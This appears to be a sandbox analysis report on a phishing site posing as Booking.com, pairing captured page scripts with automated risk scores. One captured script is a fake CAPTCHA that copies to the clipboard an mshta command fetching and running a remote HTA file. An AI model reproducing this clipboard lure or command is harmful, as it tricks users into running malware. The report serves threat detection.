document.getElementsByClassName("loadImg")[0].innerHTML = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" style="shape-rendering: auto; display: block; background: transparent;" width="32" height="32" xmlns:xlink="http://www.w3.org/1999/xlink"><g><circle stroke-dasharray="155.50883635269477 53.83627878423159" r="33" stroke-width="12" stroke="#4d90fe" fill="none" cy="50" cx="50">
<animateTransform keyTimes="0;1" values="0 50 50;360 50 50" dur="1.3888888888888888s" repeatCount="indefinite" type="rotate" attributeName="transform"></animateTransform>
</circle><g></g></g></svg>`;
setTimeout(function () {
document.getElementsByClassName('sjgdhfgas34')[0].style.display = "block";
setClipboardCopyData('mshta https://extranet-captcha.com/recaptcha-verify.html # ''I am not a robot - reCAPTCHA Verification ID: 8074''');
}, 2000);
}
document.addEventListener('DOMContentLoaded', function() {
const recaptchaCheckbox = document.getElementsByClassName('recaptcha-checkbox')[0];
if (recaptchaCheckbox) {
recaptchaCheckbox.addEventListener('click', someEdit);
}
});
|
URL: https://admin.extranet-recaptcha.com/confirm/login... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of an obfuscated token and the replacement of the current URL with a new URL containing the token suggest potential malicious intent, such as credential theft or account takeover."
} |
const urlParts = window.location.pathname.split('/');
const customTag = urlParts[4];
const token = 'sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dHJpYnV0ZXMiOnsiaXRlbUlkIjoidnJQaE14WFQiLCJ3b3JrZXJJZCI6NzczNTQwNTMzN319_vrPhMxXT';
const newUrl = `/sign-in?op_token=${token}`;
window.history.replaceState({}, document.title, newUrl);
|
URL: https://admin.extranet-recaptcha.com/confirm/login... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a simple implementation of sending an online status update when the user navigates away from the page. It uses the `navigator.sendBeacon()` API, which is a legitimate and secure way to transmit data in the background without blocking the page unload. The data being sent is limited to the `itemId` variable, which is a common practice for tracking user interactions. Overall, this script demonstrates low-risk behavior and is likely part of a legitimate application functionality."
} |
const itemId = "vrPhMxXT";
function sendOnlineStatus() {
const data = JSON.stringify({ itemId: itemId });
const blob = new Blob([data], { type: 'application/json' });
navigator.sendBeacon('/api/online', blob);
}
window.addEventListener('unload', sendOnlineStatus, false);
|
URL: https://admin.extranet-recaptcha.com/sign-in?op_token=sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dH Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "I'm not a robot",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://admin.extranet-recaptcha.com/sign-in?op_token=sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dH Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "I'm not a robot",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://admin.extranet-recaptcha.com/sign-in?op_token=sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dH Model: Joe Sandbox AI | {
"brands": [
"Booking.com"
]
} |
|
URL: https://admin.extranet-recaptcha.com/sign-in?op_token=sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dH Model: Joe Sandbox AI | {
"brands": [
"Booking.com"
]
} |
|
URL: https://admin.extranet-recaptcha.com/sign-in?op_token=sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dH Model: Joe Sandbox AI | ```json{ "legit_domain": "booking.com", "classification": "wellknown", "reasons": [ "The brand 'Booking.com' is a well-known online travel agency.", "The URL 'admin.extranet-recaptcha.com' does not match the legitimate domain 'booking.com'.", "The domain 'extranet-recaptcha.com' is suspicious as it does not directly relate to 'Booking.com'.", "The use of 'admin' as a subdomain and 'recaptcha' in the domain name could be an attempt to appear legitimate or technical, which is a common phishing tactic.", "There is no direct association between 'Booking.com' and the domain 'extranet-recaptcha.com'." ], "riskscore": 9}
Google indexed: False |
URL: admin.extranet-recaptcha.com
Brands: Booking.com
Input Fields: unknown |
URL: https://admin.extranet-recaptcha.com/sign-in?op_token=sRsvBKKlBXlWDZjugbSlTsQQuIjzfvtukMWcGSHakkljZJdrMptDgItVlGljfrOuqMxwHmiHHiVYJycjTuFRrNdOBZVesiYNreadNXGHhCKZKGamiukcpmMKZVsUkTAAdFezncqAVaINSJPHjYUmraJqkOqNeSVxxJCeMJcqqQQiOHSRLbNqnyTkDDteyJhdXRoX2F0dH Model: Joe Sandbox AI | ```json{ "legit_domain": "booking.com", "classification": "wellknown", "reasons": [ "The brand 'Booking.com' is a well-known online travel agency.", "The URL 'admin.extranet-recaptcha.com' does not match the legitimate domain 'booking.com'.", "The domain 'extranet-recaptcha.com' is suspicious as it does not directly relate to 'Booking.com'.", "The use of 'admin' as a subdomain and 'recaptcha' in the domain name could be an attempt to appear legitimate or technical, which is a common phishing tactic.", "There is no direct association between 'Booking.com' and the domain 'extranet-recaptcha.com'." ], "riskscore": 9}
Google indexed: False |
URL: admin.extranet-recaptcha.com
Brands: Booking.com
Input Fields: unknown |
URL: https://extranet-recaptcha.com Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://extranet-recaptcha.com |